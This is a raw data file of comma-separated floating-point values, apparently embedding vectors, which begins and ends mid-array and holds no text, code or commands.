0.004897473,-0.008528777,-0.003741286,0.02670839,-0.042896774,0.004515814,0.017355941,0.012058871,-0.009279,-0.010286877,-0.005540152,-0.021109477,0.00010449311,-0.006085352,-0.021600718,0.003826991,-0.014744308,0.0046654637,-0.016601255,0.01731713,-0.017310696,-0.011612114,-0.001742833,-0.10276886,-0.002803763,0.020536715,0.008806999,0.056790464,0.0037626717,-0.009246889,-0.014018475,-0.0052650627,0.011011522,0.008309736,-0.00421925,-0.012031047,-0.004349102,0.028697753,-0.017522447,-0.02385604,0.008280125,-0.0037852072,-0.031405576,0.0035827437,0.002068052,-0.01038646,-0.0072416463,0.0022179512,-0.006425479,0.0047677746,-0.02091642,-0.010641959,-0.0012916632,-0.02312158,0.0053745937,0.009583884,-0.016102284,-0.020038232,-0.01381542,0.0043985643,0.006473538,-0.010554008,-0.028514406,0.015220948,0.0020466994,0.00033411456,-0.0020337088,-0.012070267,0.003756657,-0.04243293,-0.0045693517,-0.015981544,0.008505188,-0.01031973,-0.0057401736,0.01870442,0.028968627,0.004587501,0.029316766,-0.00017548857,-0.0014885187,0.025368698,0.00012916862,-0.017864812,0.008567042,0.003649433,-0.008901123,-0.008830073,-0.0018204047,0.0071945027,0.001581667,0.011390215,0.021253962,-0.0013111086,-0.028757038,-0.008474269,-0.013422695,-0.0022719414,-0.00021586574,0.013185333,-0.017302765,-0.020306012,0.0095340405,0.04214985,-0.019403702,0.025431087,-0.0013499657,0.023243086,0.01434079,0.004386606,-0.00252587,0.009759949,0.0005454323,-0.015493077,0.00026792413,0.028110132,0.011256297,0.024090804,-0.005186497,-0.012237227,0.017261285,0.005098484,0.007629127,-0.005959247,-0.0025707944,-0.008184809,-0.0071309097,-0.005676368,-0.003049576,0.009197275,-0.011918181,-0.002013028,-0.011346183,-0.015744641,0.030576156,0.03670154,0.040918954,0.018194303,0.016206985,-0.0027158633,0.0059570405,-0.011119497,-0.021187332,-0.010680512,0.0002856931,-0.008861845,0.03707653,0.010371825,-0.0072090304,0.007526091,-0.015783774,-0.011858724,0.008360457,0.0043963036,0.02426628,0.011240157,0.008118511,-0.014958152,0.0047327625,-0.03819419,0.022522362,0.017330065,0.020117396,-0.016779635,-0.031469546,0.0015137872,-0.005087137,-0.032224916,0.025436997,-0.008282399,-0.006377087,0.009467316,-0.003348111,-0.013791948,0.007061683,0.0046257493,0.0020104456,0.0007043176,-0.016923858,-0.01102951,-0.0060000983,-0.019716946,0.006581683,-0.012638594,0.006520938,-0.004976363,0.011902545,-0.036673423,-0.00036232767,0.0066123125,-0.0014864845,0.00032122034,0.00018446738,-0.0133511275,-0.009478,-0.00077465735,-0.00526651,-0.005211182,-0.017670393,0.030573424,0.03170336,-0.006546881,-0.0074587814,-0.019532014,-0.007097168,-0.01759076,-0.023501242,0.0033460702,-0.010809238,0.010161328,-0.003170189,0.019779377,0.012050778,0.0020675133,-0.014822688,0.003974804,0.006795073,-0.008708774,-0.017003024,0.0145055605,0.008478903,-0.0142462365,0.005023206,-0.00783725,0.016713412,-0.0020683934,0.0026224353,0.022922488,0.011584625,-0.01767953,0.018688193,-0.02668833,-0.00400936,-0.027118085,0.026025478,0.0016089428,0.12435777,-0.0029642247,-0.008988773,-0.002163345,0.007010857,-0.005944255,0.010738459,0.026740422,-0.01095394,0.0034937297,0.022473268,0.003180315,0.013129865,-0.0061927135,-0.018411012,0.017807418,0.004856699,-0.027122198,-0.010598826,-0.0010270671,0.024058316,-0.01034343,-0.0150169525,-0.047403418,-0.015625201,-0.07357393,0.0281762,0.023705406,-0.007476538,0.027765196,0.018386874,-0.0092150625,-0.010875393,0.012809539,-0.007118038,0.023559727,-0.00018274487,-0.013264484,0.0072065885,-0.0241643,0.020743325,0.0047749076,-0.00554244,-0.01593964,-0.016786745,-0.004187383,0.008221382,-0.006746009,0.0051445058,0.0033273997,-0.00008556204,-0.010255741,0.00405433,-0.0015896296,0.020718345,-0.009501071,0.0001876779,0.01585866,0.008676473,-0.020972565,0.0035260615,0.020254487,0.003015653,0.0030254403,0.0142886005,0.009555836,-0.005843327,-0.015346794,-0.008228348,-0.0113166105,0.019781098,0.0031376486,0.010775924,-0.014566245,-0.013507022,0.014010722,-0.0030717242,-0.009820696,-0.0029047998,-0.0060262033,0.009838571,-0.0011477974,0.00499832,-0.0063165245,-0.0022560265,0.0038725054,-0.013566762,-0.0028836355,-0.0064478363,-0.007246423,-0.0095150275,0.03522358,0.016632933,0.013204522,-0.0021290274,0.0027045298,0.015361476,-0.008555977,-0.006843892,0.00069048075,0.001071663,-0.013408223,0.000316045,0.012767528,0.0004701141,0.007946107,0.015416544,0.020200087,-0.00020579177,-0.0014826432,0.0044714003,0.034061022,0.003028943,-0.0049449364,0.012270918,0.02074785,-0.016456386,-0.0072418065,0.005082555,-0.012872091,-0.008126153,0.014264384,0.0022050096,0.02850543,0.013307101,0.008838631,-0.01817624,-0.018425884,-0.0045638336,-0.010000898,0.014655155,-0.015280621,0.005569712,0.016884001,-0.0019370636,0.016843481,0.03843294,0.007082525,0.022414258,-0.00021058472,-0.0062352084,-0.01548339,0.0023405233,0.011250249,0.0109398095,-0.026980951,0.02205043,-0.008994066,0.014776827,0.00023455969,-0.0096774455,0.004943463,-0.0077773686,0.0036976738,0.007810811,-0.019964317,-0.0042403177,0.014696639,0.0018739122,-0.016341005,0.01070309,-0.0055398215,-0.0079005975,-0.04420841,0.035912827,0.018894542,0.0015894807,-0.014263236,0.0014216575,0.0035396789,-0.0053948443,-0.013618679,0.004389167,0.0025312481,-0.0061048637,0.02041767,0.000047472055,0.017768878,-0.020173904,0.000033611363,0.0064644897,-0.0055265883,-0.016789263,-0.004650791,0.017264942,-0.0027276576,0.0017302431,-0.013445975,-0.02592525,0.025899531,0.006481302,-0.0036902027,-0.0015042191,0.0040036812,-0.022739653,0.021062965,-0.025635956,0.02496086,-0.022619426,-0.049886137,-0.0036491898,0.017722135,0.025665915,-0.017034575,0.03427991,-0.021422416,-0.0069526904,-0.007855423,-0.0035727706,-0.0058119963,0.017046276,0.01876461,-0.014625426,-0.043224733,-0.004251232,0.013389447,-0.003483687,-0.027597435,-0.009455775,0.0040834113,-0.0044872053,0.001823085,0.0034384767,0.0045571295,0.017823938,0.015020017,-0.0009286993,0.005066577,0.022895254,-0.017422145,-0.015057581,0.013246877,0.01728444,-0.019534653,-0.015236353,0.0010204056,0.030279953,0.0106802,0.015854063,0.0060178284,-0.0137047125,0.014411724,0.015634812,0.0062243855,-0.00012057081,0.015623581,-0.0148214055,0.0019417376,-0.02526218,-0.008903991,-0.021876192,0.01122087,-0.012444566,-0.02971221,-0.04652826,-0.010357597,-0.010318315,0.029563876,0.016270677,-0.006242764,-0.0007308285,0.007397436,-0.006289404,0.012281409,-0.012283157,0.0018022219,0.006234342,-0.012276624,-0.008380335,0.022165604,-0.0015630407,0.015751923,-0.00346839,0.016618073,0.0106614,0.008498283,-0.0060498524,-0.01512365,0.008090051,-0.01045284,0.0046347445,-0.018062383,0.007121234,-0.027213,-0.0069079665,-0.0006000035,-0.00790995,0.020985547,0.059287407,-0.06092222,-0.0052259383,0.0009793693,-0.010285396,-0.011880191,0.028970191,0.0063432353,-0.024021933,-0.02769733,0.016235868,0.005665853,-0.01113563,-0.046175364,-0.018061796,0.005751513,-0.0024001163,0.0060310457,0.020700416,-0.005583024,-0.009906755,0.021654457,-0.0048494157,-0.0016863062,-0.0062760445,0.003666525,-0.005121521,-0.014891213,0.0067536556,0.006062336,-0.0043919086,0.010656736,0.016154336,-0.012970283,0.0016748443,0.014097514,-0.0003866444,0.007899648,0.00418201,-0.03044737,-0.017240595,0.0044207317,0.00085835234,-0.000514546,0.01124882,-0.014551499,-0.02592309,0.015753685,0.0028119534,0.12055618,-0.002597771,-0.0061402167,0.007279403,-0.006764317,-0.021787982,-0.0001059009,0.018858502,-0.0030859695,0.00040283252,0.030106971,-0.0013733625,0.0018661055,0.039247688,-0.0040879757,-0.013319923,0.0026915662,0.10427907,-0.01434729,0.03498581,0.009878695,0.014826868,0.008954966,-0.007955401,0.02117516,-0.074561186,-0.0032567615,-0.028021323,0.015647328,0.0001229314,-0.03607415,0.003282823,0.0027039857,-0.006944556,-0.0090603195,0.011990955,-0.0003188509,-0.013487993,-0.03361141,-0.010369608,0.014502668,-0.0120754,-0.01917014,0.001146464,-0.029166183,0.015010196,-0.032937136,0.004134408,-0.004282526,0.017172156,0.0041400436,-0.012694116,0.027004678,-0.010939205,0.01872634,0.015027369,0.0046999753,-0.0033660997,-0.026026128,0.013990515,-0.0129071055,-0.003470508,0.0014127337,0.018354766,0.0027349277,-0.0120173255,-0.009414215,-0.007286312,0.0011885607,0.013774348,0.012758386,0.0111171305,-0.01698042,-0.0033295634,0.03157776,0.01037128,0.00024758448,0.024338676,0.028608583,-0.0006030574,0.032456543,-0.005690034,-0.014656724,0.0125774,0.020476986,0.00038187098,0.008612826,0.00419901,0.043555107,0.0027998555,-0.011306361,-0.0070105977,-0.016374914,0.0133376885,0.021566933,0.013406925,0.00092687545,0.004607854,0.0041374792,-0.0092034135,-0.016065998,0.019131228,-0.0032103274,-0.015058272,-0.010862593,0.0061071273,0.008989984,-0.035306957,-0.013782936,0.005663799,0.011383006,-0.0027231628,-0.013472704,0.015662972,-0.01669563,-0.0024491765,0.0030760479,-0.014659395,-0.013110408,-0.0023355128,-0.0012312018,-0.0066624014,-0.009504983,0.01610884,-0.025831563,0.010411225,0.020786123,0.024783315,-0.0053182878,-0.002635262,-0.018137056,-0.01889689,0.016999243,0.06439371,-0.0028710845,-0.015789727,0.018146148,-0.045104317,-0.023146367,0.0064962925,0.01190163,0.0046981187,0.00719622,0.016767116,0.00030617052,0.009563323,0.012532233,-0.004913174],[-0.011266892,0.0035593184,-0.03066882,-0.025888644,0.007499426,-0.015183691,0.015371232,0.02186491,-0.004592394,-0.012237558,-0.020214245,0.027040439,0.014377014,-0.0045719887,-0.018284675,0.0010815402,0.01223997,0.0068266056,0.000766111,-0.003057376,0.0029800653,-0.00089230767,0.018830357,-0.0140197445,0.011644338,-0.0021342896,0.003618523,-0.016533514,0.015944194,0.008703785,0.0008694708,0.02758785,0.015721334,0.0071910094,-0.0032701902,0.0069757705,-0.0073791947,-0.005671474,0.0056087165,-0.0016936742,-0.024901753,0.0050247833,-0.0011503249,0.027008565,-0.0022537452,-0.0045327316,0.008668452,0.022794908,-0.000024450183,0.0055756373,0.009684441,0.009279291,-0.008758592,0.011515017,0.00728186,0.019194277,-0.00021841908,-0.028918965,0.00053268316,-0.0013654463,-0.0070298747,0.00823066,-0.0010217099,-0.01217179,0.031112853,0.00290847,0.0004641017,-0.004823367,-0.011889061,-0.023025284,0.000065888744,-0.001102236,0.005625619,-0.0059228954,0.019522678,0.012880569,0.0047208723,-0.009804813,-0.010116444,0.023146762,-0.01054485,-0.0051757614,-0.010035414,-0.0029676436,0.021136995,-0.0015752992,-0.018995387,-0.015988965,0.0077510723,-0.028062135,-0.009065961,-0.00491308,0.0050334707,0.00072153856,-0.019960744,0.013691901,0.017449683,-0.0009040275,-0.0014424305,0.0145202,-0.0015365293,-0.012086065,-0.03267848,0.013284181,0.0140489,-0.017104566,-0.0061791525,-0.0076615065,0.0016451658,-0.020913754,-0.00051913084,0.0006960954,0.0063684876,0.0026516896,-0.012143896,0.008152517,-0.0057964358,0.007894204,-0.01382246,0.011671588,-0.021041386,0.020529602,0.00061205187,-0.009801097,-0.0070393058,-0.0017946608,-0.0017792378,0.01654673,0.0043122713,-0.0033321425,-0.01100117,0.0036985348,0.0087208105,-0.013797967,0.020263586,-0.00094028184,0.012715936,-0.005442832,0.007991186,-0.034380857,0.020004364,-0.0008897341,-0.0027689103,-0.0017104788,0.030115616,0.021474497,-0.0013315193,0.020304775,0.01869954,-0.014721132,0.016210191,-0.008162984,-0.006457499,-0.024641776,0.0015765103,0.043046057,0.010742472,-0.00777262,-0.027541509,-0.01653807,-0.011688078,0.004024175,0.012973832,-0.0046661375,-0.02594171,-0.027297424,-0.0048266533,0.0017938045,-0.017066037,0.0154479835,0.014170839,0.026565101,0.012664727,0.0019863655,0.0042347023,0.017326266,-0.0008711242,-0.018952629,-0.0023104588,0.0045825136,0.01153242,0.018419432,-0.003059688,-0.0005118188,-0.008436708,0.038938906,0.023877202,-0.011083415,-0.021157607,-0.004401172,0.018500244,-0.020716952,-0.017725406,0.007806386,-0.009179057,-0.032099813,-0.009775893,0.09709248,-0.0029947183,0.006129245,-0.030139297,0.008483032,-0.00076230144,-0.0022970813,-0.007550522,-0.0031157664,-0.023130912,-0.003766002,0.023477457,-0.0017930276,0.0041386974,-0.0050789122,-0.002366209,0.008928024,-0.0023156053,-0.06546444,0.02361307,0.020096213,-0.013046231,0.013661615,-0.019475447,0.008036772,-0.005600854,-0.030422347,-0.015544128,-0.029630873,0.0138405515,0.010555607,0.0076327412,-0.015752906,-0.010327217,0.014259661,-0.03367355,-0.017746076,-0.0014412187,-0.0036527154,0.0074203485,-0.006192555,0.0040106913,-0.0061515924,-0.0051979595,0.010473969,0.038406223,0.025968017,-0.015187431,-0.00095589494,0.025039656,0.018359432,-0.02441785,0.0017775479,-0.0013947088,-0.010955045,-0.0012908286,0.01795276,-0.016114997,-0.0055096047,-0.0041333684,-0.0059918296,0.005892297,-0.00047361077,0.015344725,0.011564567,-0.0149142165,0.017571876,0.021312827,0.007759733,0.02511586,-0.052508447,-0.02224875,0.0035513723,-0.007532323,0.005314436,-0.009917491,-0.003543887,-0.0036579762,-0.0056524426,0.0067104753,-0.003935752,0.011284491,-0.0077325245,-0.000799444,0.0049552047,0.006509277,-0.019470936,-0.0047432664,0.0053538643,-0.0045402334,0.012720391,0.025742864,-0.0141626075,0.0050281915,0.0019216471,0.025186287,0.005184276,-0.025937984,-0.0028207914,-0.005659864,0.0061491374,0.010657255,-0.027082924,-0.012765681,-0.012678223,0.027145162,-0.01218093,-0.010095278,-0.011028959,-0.0066087455,0.032697275,-0.0031445255,0.03204493,-0.036680497,-0.010067931,-0.029503815,-0.006266042,-0.012445154,-0.0051286677,-0.0135487085,-0.012286987,-0.011411936,-0.012278446,0.021234717,-0.01212948,0.010447794,-0.030849222,-0.01855813,0.013486075,0.0017519519,-0.010090929,0.007334497,0.007172798,-0.015731188,0.014795023,0.021541879,0.01488657,-0.022217114,0.009755125,-0.003437844,0.0277797,0.010327742,0.011021718,-0.014142908,-0.009834378,-0.02527469,0.006178454,0.0032183067,-0.012387522,-0.0078555755,-0.0006317602,0.007485597,0.00171184,0.024601154,-0.015796823,-0.00813392,-0.0034088613,-0.014635868,-0.00611094,0.0047289026,-0.01091808,0.0011564121,-0.02599112,0.0021836434,0.0012229457,-0.012366,0.021395208,0.07968988,-0.006441072,0.0045491853,0.0005240503,-0.022363253,-0.009203043,0.022233281,0.013892199,0.0017036872,0.0018363242,-0.006492022,-0.031037694,-0.0072280746,0.010206656,-0.011564914,0.016770244,-0.03086998,-0.013783088,-0.027688233,-0.009693271,0.036180384,-0.02889521,0.013370572,0.015201788,0.009203094,0.025160987,-0.00090238254,-0.0093925735,0.003695163,-0.013423899,-0.007792167,-0.0061859703,-0.0027947654,0.010036291,-0.030441944,0.012472801,0.011057749,0.010495871,-0.027771395,-0.017391715,0.0069750077,0.005450306,-0.0072349594,-0.020757332,-0.0036249652,0.042812932,0.001453998,-0.011914274,-0.012058931,0.02015045,0.016729616,0.031459924,-0.021638235,0.012272352,0.0062987655,0.011799999,0.0050925803,-0.028945953,0.051700063,0.025437715,0.008343393,0.011801508,-0.0076029953,0.0011541396,0.0019081398,0.02950645,-0.019841824,-0.01104215,0.0037542447,0.0012848959,0.0007011464,0.015371495,-0.014414022,0.02149614,-0.010527083,0.021308258,0.0048170676,-0.009258161,0.0041656606,0.029110584,-0.009721763,0.024218567,0.02232536,0.0026379693,-0.012543951,0.0042538047,0.00071749045,0.008580326,0.010522638,-0.0068820105,-0.004676543,0.004029627,0.005286904,0.012692737,0.017207043,0.03462938,0.015145672,0.027649,-0.0043259403,0.0038823613,0.0077572567,0.0032760473,-0.0029250095,-0.009105156,-0.007453316,0.002519259,0.017790604,0.0012701997,-0.0010488504,0.011869899,-0.026040412,0.019026984,0.0038482363,-0.014833424,0.0054361434,-0.026440457,-0.008294013,-0.008123244,-0.022075485,-0.0046013105,0.02127325,0.0012124319,0.007995428,0.019557469,-0.0015777797,-0.0031985415,-0.013010795,0.0029285783,-0.009082579,0.028220396,0.0034398346,0.044981673,0.013053524,-0.028230779,0.02250867,0.012298301,-0.015265852,-0.03160277,0.040469453,0.010674144,0.0038528908,0.034103256,0.048811577,-0.0033801002,0.005137773,0.02293044,0.037570126,0.0019970709,-0.05069899,-0.014830105,0.0041597043,-0.0054009412,0.01183742,0.0001659784,0.0023738528,0.01157393,0.034367565,-0.020439243,-0.0059949323,-0.0028291296,0.030528154,-0.027879555,-0.0053485655,-0.0018076102,-0.016691491,0.024359234,0.0026445314,0.063543715,-0.011134569,-0.025746789,-0.0058820467,0.012426237,0.0016507022,-0.023937028,0.0070162863,-0.025459126,0.012443426,0.022947062,0.03074626,0.0045990623,0.0036944656,-0.008691752,-0.013850081,0.013624164,0.011135564,-0.009305712,0.002417692,-0.0042949147,-0.0018624029,0.008798222,-0.02745581,-0.011140131,-0.0030787308,0.032079127,0.007357747,-0.011241237,-0.025971264,-0.016612494,-0.0017884135,0.026524693,-0.0056745,-0.0014875516,-0.0006174661,0.019236628,-0.007923412,-0.020544922,0.026121667,-0.013070778,0.014665119,0.008057559,0.025119778,0.03877721,0.0044915364,0.0055390988,0.0079586115,0.015554113,-0.011488658,-0.00023201643,0.015683893,0.017883329,0.020919299,-0.0213677,0.010733696,0.0155147705,0.012945054,-0.011000117,0.013528606,-0.012542079,-0.0010692899,-0.010042052,-0.006149297,-0.01465429,-0.0017028878,-0.0065424247,-0.01725031,-0.0018780684,-0.022134263,-0.005273523,0.01370939,-0.0088284565,-0.015842972,0.033025958,0.004453193,-0.0051990612,0.024788262,0.02294224,-0.011919757,-0.0039365543,0.011533189,0.0059872395,-0.0059851375,0.0009356016,0.0074781543,0.004558828,0.00020137496,0.0025241799,-0.014235092,0.010694319,-0.010671521,0.016782045,-0.003088435,0.008637841,0.0060196714,0.010282884,-0.035176694,0.005437544,0.019008083,-0.031703454,-0.0024107355,-0.00885617,0.040706486,-0.013309374,-0.0022375516,0.003145232,0.0061456254,-0.000045458775,-0.022533579,0.018347003,-0.055223905,-0.0032516506,-0.0072384146,0.0019120151,-0.019994223,0.03300438,0.011955341,0.00053275505,-0.004749676,-0.0077004973,-0.01727381,0.006872202,-0.010116429,0.009357981,-0.0031892387,-0.008373096,-0.027737651,-0.0048372503,-0.030195586,-0.037832398,-0.027827414,0.041237563,0.0031269023,-0.00154068,-0.0015016596,0.024676975,-0.0063801366,-0.019222984,0.004421929,-0.026500765,0.004087196,0.009139672,-0.009502253,0.021275658,0.011654991,0.015460896,-0.011959197,-0.035774555,0.0017873396,0.007273664,0.016492756,-0.03538301,-0.006809359,0.021501668,-0.014106956,0.014200931,-0.004923665,0.032574568,0.007332788,0.05066981,0.016038822,0.01067462,-0.0071391053,0.003988411,-0.0120076295,0.0026136823,0.0021015585,0.043682914,0.0034078115,0.01639038,0.02286753,-0.011543839,0.0021220695,-0.013515889,0.016274448,0.02445473,0.030062184,-0.00069305766,0.005773621,-0.023446232,0.00860598,0.017788516,0.007717423,0.0011735654,0.014797162,0.02356902,-0.0013232604,0.03461323,-0.0017617318,0.0013379198,-0.01809808,-0.005806637,-0.012637008,0.026812904,0.016534986,-0.0026283711,0.012747477,0.0011866522,0.0012255523,-0.003255726,-0.017554104,-0.015320354,-0.019668063,-0.036755066,0.0041592405,-0.005775774,0.0022576295,-0.051636618,0.010042987,0.033061124,0.006400176,-0.010182692,-0.0054011294,-0.018460978,-0.0017456516,-0.029045051,-0.035674702,-0.008398777,0.009072049,0.031379245,-0.038868558,0.0031283598,0.011398149,0.005679861,-0.001870822,0.01907726,-0.018624498,-0.015483969,-0.0069247494,-0.015068464,0.02675136,0.0092459405,0.017938182,0.014955826,-0.011287495,-0.0105352625,-0.021148121,-0.013380541,-0.010102866,-0.0012237966,0.0077639944,-0.0010258856,0.004752989,-0.0084748715,-0.013537283,-0.011661278,0.02258477,-0.034024987,-0.021543432,0.0009847952,0.019894375,-0.0000616762,0.016747365,-0.024596184,0.030954901,0.01623696,-0.008408337,0.0005121921,-0.015361183,0.011309848,0.022444066,0.025960242,-0.025317503,-0.037396092,-0.009758319,0.003006582,-0.013821026,0.020193383,0.005817186,-0.007924514,-0.017193802,-0.019642456,-0.003785382,-0.030430337,0.0008679303,0.009425202,-0.028994706,0.027855756,-0.020551022,0.017851442,0.007079555,0.011221789,0.0060915104,-0.008468867,0.022693057,-0.029392198,-0.019569611,0.021314196,-0.0047131535,0.0025024877,0.018508812,-0.024321258,-0.01968852,-0.033521138,-0.00010746084,-0.011283048,0.023592822,-0.0021193295,-0.013099448,-0.031237558,-0.0015803955,-0.0033502453,0.009339607,-0.031993777,-0.013341211,-0.0032839056,0.0005341507,0.009459684,0.014856485,-0.03514733,0.023728276,0.007786956,-0.012458368,0.021702394,0.009267343,0.0115469415,-0.002028096,0.010802056,0.01402836,-0.038378995,0.025974253,-0.026662251,0.012064785,0.04241355,-0.0092496555,-0.0025777153,0.007238476,-0.014307922,-0.023690054,-0.0068535157,0.017998999,-0.011056619,-0.0045720693,0.0026692885,-0.002169594,0.0034189706,0.001441244,0.029218758,0.00766726,-0.010217314,0.02631519,0.0054807416,-0.03596894,-0.015205698,0.0062946915,0.007257343,-0.0060160286,0.0040694554,-0.013044816,0.02594618,0.032802984,-0.009750499,-0.020027002,0.014908616,-0.0060757515,-0.0023114532,0.01059254,-0.0010315778,-0.011558847,-0.0053617326,0.02807934,-0.029800268,-0.018353373,-0.006021484,-0.007356224,-0.0019108739,-0.02453717,0.0049300245,-0.009757146,0.003483884,0.003297052,-0.010111245,-0.011364685,-0.017646292,0.02472538,-0.015415556,-0.007949874,0.008635663,-0.0039276965,0.0031598816,0.003949262,0.00069735915,-0.0068708993,0.014087489,0.0020109655,-0.011038298,0.00504759,-0.0043035415,-0.0060160356,0.0071222526,-0.009775193,0.02104722,0.018182179,-0.0076705976,0.011617599,-0.015314155,-0.021879708,0.003922432,-0.00798968,-0.023185028,-0.008071957,0.02447372,0.022131307,-0.00015656048,-0.0060481676,-0.020817209,-0.07196194,0.0075287255,-0.012434064,-0.028073447,0.0032922646,0.005811476,0.014432033,0.014276556,0.03664874,-0.006744611,-0.0061436053,0.0065057846,0.0063702078,0.001043579,0.0050122878,-0.011714571,-0.01104326,0.00894424,0.019696685,0.0056952033,0.0074349525,-0.0034727799,0.011511936,0.0020992407,0.031769026,-0.0016742172,-0.01831962,-0.018964909,-0.03299642,-0.0047686775,-0.01045831,0.013478937,-0.004498738,-0.006399818,-0.021894215,-0.010335652,0.008531829,0.018545935,-0.013856235,0.0069073555,-0.014507613,-0.00022576665,-0.008863761,0.040616952,-0.005612401,-0.011973991,0.017205965,-0.0056826645,-0.0016037938,0.0011027995,0.009622708,-0.01057761,0.008422151,0.015477472,0.0026837734,0.018116852,0.008170511,0.020264946,0.0249603,0.0010153981,0.0048065344,-0.0040070824,0.010766319,0.013483263,-0.018719124,-0.0035922476,0.0023569958,0.04455278,-0.023457501,-0.0063263634,-0.012658578,-0.0092788935,-0.015830994,-0.0059832917,-0.028498169,0.014061674,-0.009688407,-0.0052393507,-0.005003156,-0.015599133,-0.010416017,0.007560497,-0.027292993,-0.0036171018,-0.028575389,-0.0046660113,-0.0054669897,-0.010549046,0.00050912786,-0.01428864,-0.003009454,0.0040240623,-0.0008664629,-0.00010886608,0.0043325066,0.035365764,-0.004591936,-0.0072275596,0.008510056,-0.0021163712,0.025905333,-0.0020141008,0.0028251347,0.046314206,-0.0049990914,0.0006480117,0.005020098,0.020513296,0.022834977,0.022881204,-0.009526698,0.009373072,-0.00649432,0.016148701,0.029184094,0.0024622576,-0.015669636,0.024333276,0.03876346,0.025933323,0.011765537,-0.006073363,0.018941501,-0.008353245,0.014288254,0.009630492,0.025189463,0.00080455624,-0.01644014,0.011531517,-0.007363136,0.027412789,0.009507673,-0.028203558,0.028887033,-0.00058998016,0.015231421,-0.042575784,-0.011439219,0.0037303213,-0.012784261,-0.0014189372,-0.0073448266,0.0069054076,0.014891805,-0.0330731,-0.0012204088,0.010432976,-0.004507462,0.0036886376,0.013175287,0.016537711,0.005904471,0.01514445,0.0021803838,0.008482627,0.019832527,-0.022888517,0.012735385,0.0063659074,-0.012953439,-0.024253257,-0.0038942096,0.009411302,-0.021110104,0.014999357,-0.011048405,0.008640817,-0.0011589008,0.004077037,0.003040525,0.011127288,-0.021289548,0.029704068,-0.0048073335,-0.008230892,0.022939451,0.023078058,0.014156625,0.013094147,-0.0014225477,0.03521279,0.0046863384,0.006483846,0.00415177,-0.0042417366,-0.0071915225,0.006180538,-0.021764677,-0.009725011,-0.014673479,-0.016257625,0.018754248,0.009129988,-0.008952879,0.048645418,-0.013671064,0.016724179,0.0015185672,-0.018961094,-0.0045273053,0.023367988,0.0118108215,0.018870845,-0.00910145,0.01329128,0.025650963,-0.04577672,-0.00216296,-0.005654051,-0.014768809,-0.0041120797,-0.0045001763,-0.018692454,-0.017092202,0.0058061574,-0.022632338,0.002253854,0.023856226,-0.023410732,0.0034537502,0.03516688,0.016132986,0.0054172813,0.00017734239,-0.010970448,0.022150477,0.010837725,0.005462362,-0.0061309556,0.019926015,0.012687344,0.016905764,0.013513979,-0.037986122,-0.004498533,-0.015831055,0.006274768,-0.004264268,-0.019688817,0.0046328898,0.010051819,0.027166747,-0.010009024,-0.010721653,0.03461742,-0.0061987336,0.011095025,0.016079469,0.010066853,-0.006634397,0.010952414,0.011295511,0.012062986,-0.0011383882,-0.0070154085,-0.030735329,0.005139641,-0.01653928,-0.008143298,-0.017369522,0.002736136,-0.016252838,0.00058484427,-0.0005770586,0.008777554,-0.0070547233,0.021703722,0.02333346,0.015045518,-0.0015116055,-0.0007367424,0.0030659866,0.014354849,0.0023645654,-0.005748196,-0.0135410195,-0.021151884,0.010322713,0.014926803,0.000540833,-0.0019612224,-0.007803325,-0.030915776,0.000727448,0.01366992,0.018376945,-0.016573073,0.015877862,0.009028918,-0.012578935,-0.03960198,0.008800423,-0.003691408,0.0059468118,-0.018270807,-0.022860726,-0.0040402827,-0.006251311,-0.00029034846,0.07464146,-0.011133843,0.0017438852,-0.0038544168,0.011064771,-0.029995365,0.019097539,0.0005802759,0.009125759,-0.020524936,-0.022832738,-0.025993112,-0.0010372788,-0.016960576,0.0056266636,-0.007005653,0.01508711,0.0020289219,0.0048598284,0.02557961,0.0011507078,-0.0057333047,-0.002534646,-0.0026018296,0.003995306,0.013685197,0.0212637,-0.022424852,0.020396534,-0.01667167,0.00803545,-0.018247472,-0.00888843,0.019351235,-0.0023738716,-0.00843033,0.024621977,0.00997106,-0.032303084,0.026184922,-0.0052052536,-0.017614175,0.03350398,0.00642822,0.010021566,-0.0073263836,-0.020735793,-0.0045179026,0.0075159925,-0.0051405462,0.013753862,-0.0066728913,-0.019381339,0.016355146,-0.020969035,0.028440235,-0.0032416703,0.028051905,0.01530244,-0.0013769836,-0.0037871732,-0.0057338923,0.005964834,-0.005652573,-0.015922561,0.009710632,0.00011780714,-0.025137512,0.026411323,-0.023484387,0.01919938,-0.006113549,0.0011770108,0.01846478,0.00076311425,0.010668159,0.010859853,-0.010926523,0.008503578,-0.023783414,-0.0019100658,-0.0009426193,0.02547931,0.012220374,-0.02144565,0.01260887,-0.00669916,0.007192337,0.08411164,0.02475913,0.012182787,-0.0038734663,0.0014694235,0.024030862,0.000345788,0.025051584,-0.00064555474,0.01013416,-0.023013227,0.015402376,0.0068003098,0.0014134226,0.016920142,-0.018562172,0.008917784,0.0031754898,0.0050651217,-0.014687457,0.004190161,0.024730325,0.019703936,0.00025548856,-0.0046947827,0.013230419,0.0032089793,-0.011806484,-0.0005792475,-0.0146870185,-0.018851351,0.02888317,0.01214718,-0.003832886,-0.018705774,-0.048654158,-0.0059450413,0.11793,0.016275166,-0.007810317,0.021493794,-0.006255597,0.012548618,-0.113904394,0.009959781,0.0074653598,-0.013883856,0.0002738049,-0.01031565,-0.012377156,0.01652403,0.007093573,-0.018276488,-0.008568578,-0.015449317,0.020666312,-0.017759591,-0.0058563445,0.012396471,-0.00082885544,-0.00057902077,-0.027789667,-0.017448666,-0.00018700963,-0.009968425,-0.014381729,-0.016916636,0.01107275,0.0042605097,0.0074095167,-0.018857034,-0.019236408,0.012632353,0.019073356,0.0016924134,-0.015487186,-0.012449448,0.016484378,-0.0016275286,-0.01687551,-0.041366253,-0.1511793,0.0035309652,0.0038206147,-0.041936822,0.010919371,-0.013810023,0.008815251,-0.00699653,0.009162065,0.007330571,-0.013550055,0.028302528,-0.0046435785,0.013489643,-0.026637329,-0.0033243697,-0.00444204,0.003728851,-0.0033082648,0.008913255,0.0011230801,0.00590172,-0.031046433,-0.017398614,-0.0106182955,0.0097787585,-0.0020242746,0.029640097,0.0017037715,-0.0053639696,-0.0064973934,-0.016720599,-0.011299115,0.0062836315,0.001178203,-0.018156309,-0.009793888,0.010444759,-0.022689069,0.016516479,-0.011009476,-0.00209837,-0.0030107119,0.01253803,0.0095597,0.002805763,0.017493179,0.01694781,0.023833688,-0.0023890552,0.036365878,0.001085548,-0.01992315,0.006910217,-0.0017351178,-0.007973741,-0.009721266,-0.033895086,-0.009582821,0.0069258744,-0.0008673506,-0.0093629705,-0.013770161,-0.0041606436,0.02375757,-0.0075660446,0.021740803,-0.01920955,0.00047235787,0.015050782,-0.0067035006,-0.00073510926,0.0023283425,-0.020174703,0.014994811,0.0031453685,-0.0013640958,-0.009530509,0.0